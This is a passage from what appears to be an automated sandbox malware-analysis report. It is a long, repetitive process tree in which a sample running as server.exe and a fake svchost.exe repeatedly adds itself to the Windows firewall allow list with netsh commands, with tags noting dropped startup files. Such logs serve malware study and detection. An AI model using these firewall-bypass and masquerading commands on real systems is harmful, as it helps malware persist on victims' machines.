        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        95⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4900
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        96⤵
        
        PID:7068
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        95⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6624
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        96⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        95⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1552
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        95⤵
        System Location Discovery: System Language Discovery
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        96⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:3924
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        97⤵
        Modifies Windows Firewall
        
        PID:6680
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        97⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1632
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        97⤵
        
        PID:4028
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        97⤵
        
        PID:6380
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        98⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:6020
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        99⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6584
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        99⤵
        Modifies Windows Firewall
        
        PID:5928
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        99⤵
        
        PID:5756
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        99⤵
        
        PID:6192
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        100⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:6500
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        101⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        101⤵
        
        PID:6852
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        101⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:6764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        102⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        101⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        102⤵
        Drops startup file
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:5816
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        103⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:5900
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        103⤵
        
        PID:5344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        104⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        103⤵
        
        PID:4736
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        103⤵
        
        PID:4500
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        104⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        105⤵
        
        PID:5324
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        105⤵
        
        PID:6764
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        105⤵
        
        PID:4284
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        105⤵
        
        PID:5812
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        106⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        107⤵
        
        PID:3116
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        107⤵
        Modifies Windows Firewall
        
        PID:6004
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        107⤵
        
        PID:3324
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        107⤵
        
        PID:6504
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        108⤵
        
        PID:5900
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        109⤵
        
        PID:1632
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        110⤵
        
        PID:7076
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        109⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        109⤵
        
        PID:6384
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        109⤵
        
        PID:560
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        110⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        111⤵
        Modifies Windows Firewall
        
        PID:5948
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        111⤵
        
        PID:1444
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        111⤵
        
        PID:5696
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        111⤵
        
        PID:7040
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        112⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        113⤵
        Modifies Windows Firewall
        
        PID:3908
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        113⤵
        Modifies Windows Firewall
        
        PID:5424
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        113⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        113⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        114⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        115⤵
        
        PID:752
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        115⤵
        
        PID:5128
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        115⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        115⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        116⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        117⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        117⤵
        Modifies Windows Firewall
        
        PID:7080
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        117⤵
        
        PID:5284
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        117⤵
        
        PID:6224
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        118⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        119⤵
        
        PID:6612
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        119⤵
        
        PID:6920
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        119⤵
        Modifies Windows Firewall
        
        PID:2096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        120⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        119⤵
        
        PID:5792
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        120⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        121⤵
        
        PID:5480
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        121⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        121⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        121⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        122⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        123⤵
        Modifies Windows Firewall
        
        PID:2656
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        123⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        123⤵
        
        PID:3116
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        123⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        124⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        125⤵
        
        PID:4512
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        125⤵
        
        PID:5292
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        125⤵
        Modifies Windows Firewall
        
        PID:6880
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        125⤵
        
        PID:4348
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        126⤵
        
        PID:5416
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        127⤵
        
        PID:960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        128⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        127⤵
        Modifies Windows Firewall
        
        PID:5880
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        128⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        127⤵
        
        PID:256
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        127⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        128⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        129⤵
        
        PID:6612
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        129⤵
        
        PID:6464
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        130⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        129⤵
        
        PID:7040
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        129⤵
        
        PID:6296
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        130⤵
        
        PID:6388
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        131⤵
        Modifies Windows Firewall
        
        PID:2000
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        131⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        131⤵
        
        PID:2212
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        131⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        132⤵
        
        PID:4892
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        133⤵
        Modifies Windows Firewall
        
        PID:5940
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        133⤵
        Modifies Windows Firewall
        
        PID:5844
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        133⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        133⤵
        
        PID:6612
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        134⤵
        
        PID:2064
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        135⤵
        
        PID:6384
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        135⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        135⤵
        Modifies Windows Firewall
        
        PID:5524
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        135⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        136⤵
        
        PID:4892
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        137⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        137⤵
        Modifies Windows Firewall
        
        PID:3328
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        137⤵
        
        PID:3844
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        137⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        138⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        139⤵
        Modifies Windows Firewall
        
        PID:5300
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        139⤵
        
        PID:6432
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        139⤵
        Modifies Windows Firewall
        
        PID:440
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        139⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        140⤵
        
        PID:6468
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        141⤵
        
        PID:5836
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        142⤵
        
        PID:6824
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        141⤵
        
        PID:5552
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        141⤵
        
        PID:6896
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        141⤵
        
        PID:6300
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        142⤵
        
        PID:1332
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        143⤵
        
        PID:6852
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        143⤵
        Modifies Windows Firewall
        
        PID:5564
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        143⤵
        
        PID:5320
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        143⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        144⤵
        
        PID:7044
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        145⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        145⤵
        
        PID:6020
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        146⤵
        
        PID:6852
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        145⤵
        
        PID:3864
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        145⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        146⤵
        
        PID:608
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        147⤵
        
        PID:7056
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        147⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        147⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        147⤵
        
        PID:196
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        148⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        149⤵
        
        PID:6044
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        149⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        149⤵
        
        PID:5836
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        149⤵
        
        PID:7084
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        150⤵
        
        PID:4144
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        151⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        151⤵
        Modifies Windows Firewall
        
        PID:5308
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        151⤵
        Modifies Windows Firewall
        
        PID:6908
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        151⤵
        
        PID:220
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        152⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        153⤵
        
        PID:1692
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        153⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        153⤵
        
        PID:4340
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        153⤵
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        154⤵
        
        PID:5588
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        155⤵
        
        PID:5580
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe"
        155⤵
        
        PID:1552
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        155⤵
        
        PID:2088
        
        C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        155⤵
        
        PID:3908
        
        C:\Users\Admin\AppData\Local\Temp\server.exe
        
        "C:\Users\Admin\AppData\Local\Temp\server.exe"
        156⤵
        
        PID:1784
        
        C:\Windows\SysWOW64\netsh.exe
        
